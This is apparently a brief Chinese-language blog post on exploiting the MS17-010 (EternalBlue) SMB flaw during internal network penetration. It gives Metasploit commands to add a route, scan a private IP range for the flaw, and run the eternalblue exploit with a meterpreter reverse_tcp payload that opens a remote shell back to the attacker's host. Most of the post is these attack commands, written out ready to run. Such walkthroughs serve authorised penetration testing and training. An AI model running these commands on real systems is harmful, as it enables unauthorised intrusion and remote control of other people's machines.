前言

在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010。

ms17_010_eternalblue模块
在msf成功接收session之后,添加路由

run autoroute -p 

使用Metasploit的ms17-010相关的模块进行探测是否存在该漏洞

启动Metasploit

msfconsole
use  auxiliary/scanner/smb/smb_ms17_010
set  rhosts 192.168.2.100-200   
set  threads 3

显示有漏洞
请输入图片描述

尝试利用漏洞

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set rhost 192.168.2.165   
set lhost 192.168.2.117   #自己的ip
run

成功
请输入图片描述

Last modification:October 6th, 2020 at 02:28 am
如果觉得我的文章对你有用,请随意赞赏